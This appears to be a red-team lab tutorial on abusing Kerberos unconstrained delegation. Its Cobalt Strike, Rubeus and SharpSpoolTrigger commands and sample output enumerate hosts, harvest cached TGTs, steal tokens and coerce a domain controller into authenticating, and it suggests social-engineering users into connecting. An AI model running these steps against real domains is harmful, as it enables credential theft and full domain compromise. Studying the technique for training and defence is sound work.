Unconstrained Delegation

Introduction

Delegation allows a user or computer to impersonate another account in order to access resources (such as backend database servers). Practical examples can be found here.

Unconstrained delegation will cache the user's TGT if it interacts with the system. So if we compromise a machine with unconstrained delegation, we can extract any TGT from it's memory and use them to impersonate users.

Technique: If we compromise a computer with unconstrained delegation, we can social engineer a user to interact with it and steal their TGT. We can also just wait for users and harvest TGT's! Interaction can be as simple as dir \web\c$

Note: Domain Controllers are always permitted for unconstrained delegation.

Enumerate computers with unconstrained delegation

beacon> execute-assembly C:\Tools\ADSearch.exe --search 
"(&(objectCategory=computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" 
--attributes samaccountname,dnshostname

Rubeus triage & monitor

Rubeus triage & monitor will show all tickets that are currently cached. It will show the users LUID. The faster way is just to use monitor.

beacon> execute-assembly C:\Tools\Rubeus.exe triage
beacon> execute-assembly C:\Tools\Rubeus.exe monitor /interval:10 /nowrap

Rubeus Dump TGT

From the triage & createnetonly we can dump the TGT

beacon> execute-assembly C:\Tools\Rubeus.exe dump /luid:<luid-from-triage> /nowrap

beacon> execute-assembly C:\Tools\Rubeus\Rubeus.exe createnetonly /program:C:\Windows\System32\cmd.exe 
/domain:DEV /username:cfoxy /password:Password123! /ticket:blah

[*] Showing process : False
[*] Username        : cfoxy
[*] Domain          : DEV
[*] Password        : Password123!
[+] Process         : 'C:\Windows\System32\cmd.exe' successfully created with LOGON_TYPE = 9
[+] ProcessID       : 1540
[+] Ticket successfully imported!
[+] LUID            : 0x3206fb

Steal Token

We can steal use token with Cobalt Strike's steal_token.

beacon> steal_token 1540

beacon> ls \\dc-2.rotta.lab\c$

Harvest TGT by forcing authentication

We can obtain TGT's for computer accounts by forcing them to authenticate remotely to the unconstrained machine.

Rubeus monitor

Rubeus' monitor command will drop into loop and continuously monitor for and extract new TGT as they get cached. It's a superior strategy when compared to running triage manually because there's little chance of us not seeing or missing a ticket.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe monitor /interval:10 /nowrap

[*] Action: TGT Monitoring
[*] Monitoring every 10 seconds for new TGTs

SharpSpoolTrigger

Next, run SharpSpoolTrigger.

beacon> execute-assembly C:\Tools\SharpSpoolTrigger.exe dc-2.rotta.lab web.rotta.lab

Where:

  • DC-2 is the "target".

  • WEB is the "listener".

Rubeus will then capture the ticket.

[*] 9/6/2022 2:44:52 PM UTC - Found new TGT:

  User                  :  dc-2$.rotta.lab
  StartTime             :  9/6/2022 9:06:14 AM
  EndTime               :  9/6/2022 7:06:14 PM
  RenewTill             :  9/13/2022 9:06:14 AM
  Flags                 :  name_canonicalize, pre_authent, renewable, forwarded, forwardable
  Base64EncodedTicket   :

doIFuj[...]lDLklP

To stop Rubeus, use the jobs and jobkill commands.\

Last updated